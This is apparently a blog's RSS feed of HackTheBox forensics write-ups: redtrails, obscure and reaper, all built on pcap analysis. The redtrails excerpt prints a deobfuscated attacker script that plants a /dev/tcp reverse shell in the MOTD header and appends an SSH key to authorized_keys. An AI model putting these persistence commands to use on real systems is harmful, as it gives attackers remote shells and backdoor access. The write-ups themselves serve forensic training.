<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Pcap on Mike.Horn</title>
    <link>https://mikehorn-git.github.io/tags/pcap/</link>
    <description>Recent content in Pcap on Mike.Horn</description>
    <generator>Hugo</generator>
    <language>en</language>
    <lastBuildDate>Thu, 10 Oct 2024 00:00:00 +0200</lastBuildDate>
    <atom:link href="https://mikehorn-git.github.io/tags/pcap/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>redtrails</title>
      <link>https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/</link>
      <pubDate>Thu, 10 Oct 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/</guid>
      <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;The flag is split into &lt;strong&gt;three parts&lt;/strong&gt;. In this investigation, we were able to recover &lt;strong&gt;two parts&lt;/strong&gt;. We start from a provided &lt;code&gt;.pcap&lt;/code&gt; file.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;1st-part&#34;&gt;1st part&lt;/h1&gt;
&lt;p&gt;The capture contains &lt;strong&gt;two HTTP frames&lt;/strong&gt;. The second frame is large and contains interesting data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load the payload in &lt;strong&gt;CyberChef&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Apply &lt;strong&gt;reverse&lt;/strong&gt; and &lt;strong&gt;Base64 decode&lt;/strong&gt; operations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt=&#34;CyberChef&#34; loading=&#34;lazy&#34; src=&#34;../../writeups/htb/challenges/redtrails/2024-10-08T21:38:10,624043836+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;After decoding, deobfuscate the &lt;strong&gt;bash script&lt;/strong&gt; manually.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;cp&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;lhJVXukWibAFfkv&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    &lt;span class=&#34;nb&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;s1&#34;&gt;&amp;#39;bash -c &amp;#34;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.0.200/1337 0&amp;gt;&amp;amp;1&amp;#34;&amp;#39;&lt;/span&gt; &amp;gt; /etc/update-motd.d/00-header
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;x7KG0bvubT6dID2&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;    &lt;span class=&#34;nb&#34;&gt;echo&lt;/span&gt; -e &lt;span class=&#34;s2&#34;&gt;&amp;#34;\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35&amp;#34;&lt;/span&gt; &amp;gt;&amp;gt; ~/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;hL8FbEfp9L1261G&lt;span class=&#34;o&#34;&gt;()&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	lhJVXukWibAFfkv
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;	x7KG0bvubT6dID2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;hL8FbEfp9L1261G
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The script reveals the &lt;strong&gt;first flag&lt;/strong&gt; embedded in an &lt;code&gt;ssh-rsa&lt;/code&gt; key.&lt;/p&gt;</description>
    </item>
    <item>
      <title>obscure</title>
      <link>https://mikehorn-git.github.io/writeups/htb/challenges/obscure/</link>
      <pubDate>Sun, 29 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/challenges/obscure/</guid>
      <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;We are provided with two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;PCAP file&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;PHP file&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h1 id=&#34;pcap-analysis&#34;&gt;PCAP Analysis&lt;/h1&gt;
&lt;p&gt;Start by analyzing the PCAP before fully deobfuscating &lt;code&gt;support.php&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Filter for &lt;strong&gt;HTTP POST&lt;/strong&gt; requests:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;POST&#34; loading=&#34;lazy&#34; src=&#34;./assets/2024-09-28T23:17:53,862253486+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;Only &lt;strong&gt;4 POST requests&lt;/strong&gt; are present.&lt;/p&gt;
&lt;p&gt;Follow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt=&#34;STREAM&#34; loading=&#34;lazy&#34; src=&#34;./assets/2024-09-28T23:22:19,040121186+02:00.png&#34;&gt;&lt;/p&gt;
&lt;p&gt;These strings will be used as input for the PHP deobfuscation.&lt;/p&gt;
&lt;hr&gt;
&lt;h1 id=&#34;php-analysis&#34;&gt;PHP Analysis&lt;/h1&gt;
&lt;p&gt;The provided PHP script performs multiple layers of obfuscation:&lt;/p&gt;</description>
    </item>
    <item>
      <title>reaper</title>
      <link>https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/</link>
      <pubDate>Sat, 21 Sep 2024 00:00:00 +0200</pubDate>
      <guid>https://mikehorn-git.github.io/writeups/htb/sherlocks/reaper/</guid>
      <description>&lt;h1 id=&#34;q1-ip-address-of-forela-wkstn001&#34;&gt;Q1: IP Address of Forela-Wkstn001&lt;/h1&gt;
&lt;p&gt;What is the IP address of &lt;strong&gt;Forela-Wkstn001&lt;/strong&gt;?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 See Q2 for the analysis steps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h1 id=&#34;q2-ip-address-of-forela-wkstn002&#34;&gt;Q2: IP Address of Forela-Wkstn002&lt;/h1&gt;
&lt;p&gt;What is the IP address of &lt;strong&gt;Forela-Wkstn002&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; NetworkMiner requires &lt;code&gt;.pcap&lt;/code&gt; format. Convert the file if needed:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;tshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Open the capture in &lt;strong&gt;NetworkMiner&lt;/strong&gt; to get an overview of network activity.
Both workstation IP addresses can be identified here:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&#34;NetworkMiner Overview&#34; loading=&#34;lazy&#34; src=&#34;../../writeups/htb/sherlocks/reaper/2024-09-21T15_32_55,042790459+02_00.png&#34;&gt;&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
